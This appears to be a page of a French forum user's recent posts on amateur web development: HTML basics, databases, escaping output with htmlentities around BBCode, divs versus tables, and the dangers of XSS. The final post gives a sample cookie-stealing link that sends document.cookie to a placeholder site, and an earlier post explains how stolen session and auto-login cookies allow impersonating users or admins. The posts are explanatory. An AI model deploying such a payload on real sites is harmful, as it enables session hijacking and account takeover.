Ses derniers messages sur les forums
hummmmm !!! Y a bien <html>,<head>,</head>,<body>,</body> et </html> !!!
En effet !!!
Oui c' est vrai...
Je pensais au contenu
!!!
Construis tes pages autourd d' une base de donnée !!!
C' est la meilleur solution. Et puis cela te permettra d' ajouter par exemple un moteur de recherche et tout le tralala ...
Et puis, si tu veux vraiment faire évoluer ton site, c' est le meilleur moyen !!!!
Bye...
Hé !!! C' était à moi qu' il s' adressait !!!!
J' essayerai d' être plus rapide la prochaine fois...
Personne ??? Bon...
Il ne reste donc plus qu' à tout simplement essayer !!!
On verra bien...
Bye...
Tu utilises le htmlentities JUSTE à la sortie de ta base de donnée. SURTOUT pas après avoir généré les balises html pour ton bbcode !!!!
Sinon, là ton bbcode ne te servira plus à rien !!!
Je veux pas prendre sa défence !!!
Mais souvenez-vous de vos premier site ???
Bon, l' histoire du <body> et du </html> n' est pas excusable... Mais je vous rappel que vous êtes sencé l' encouragé !!! Nan ???
Parcontre, histoire d' ajouter un peu ma contribution au critiques (tellement constructives d' ailleurs
) les tableaux c' est vraiment à PROSCRIRE pour le design d' un site
!!!!
Les divs existent aussi !!!
Bye...
Tain, c' est dingue !!!
Et quant je pense qu' il y en a qui réponde.
C' est fou !!!!
Heu !!!!
document.cookie renvoit la valeur des cookies !!!
Donc cela veut dire cookie de sessions. Il a donc 180mn pour émuler le cookie et se connecter à la place de la personne...
Il récupère aussi le cookie du choi du design (site multi-couleur), enfin bon pas tellement dangereux mais il récupère aussi le cookie de l' auto-connexion. Et sa beaucoup plus grave. Pour peut que le systeme de gestion des droits d' admin se passe par un cookie, bin il aura tous les droits des admins...
Pas super du tout...
Bye...
XSS = Cross site scripting
Appelé XSS afin de ne pas confondre avec les feuilles de styles CSS !!!
XSS est le fait d' injecter des scripts javascript ou de l' html !!!
La faille se trouve souvent des les forums amateurs.
exemple: <a href="javascript:location='http://ton_site.com/index.php?cookie='+document.cookie"> Cliquez ici pour voir une superbe photo</a>
Je te laisse diviner le danger de ce script !!!
Bye...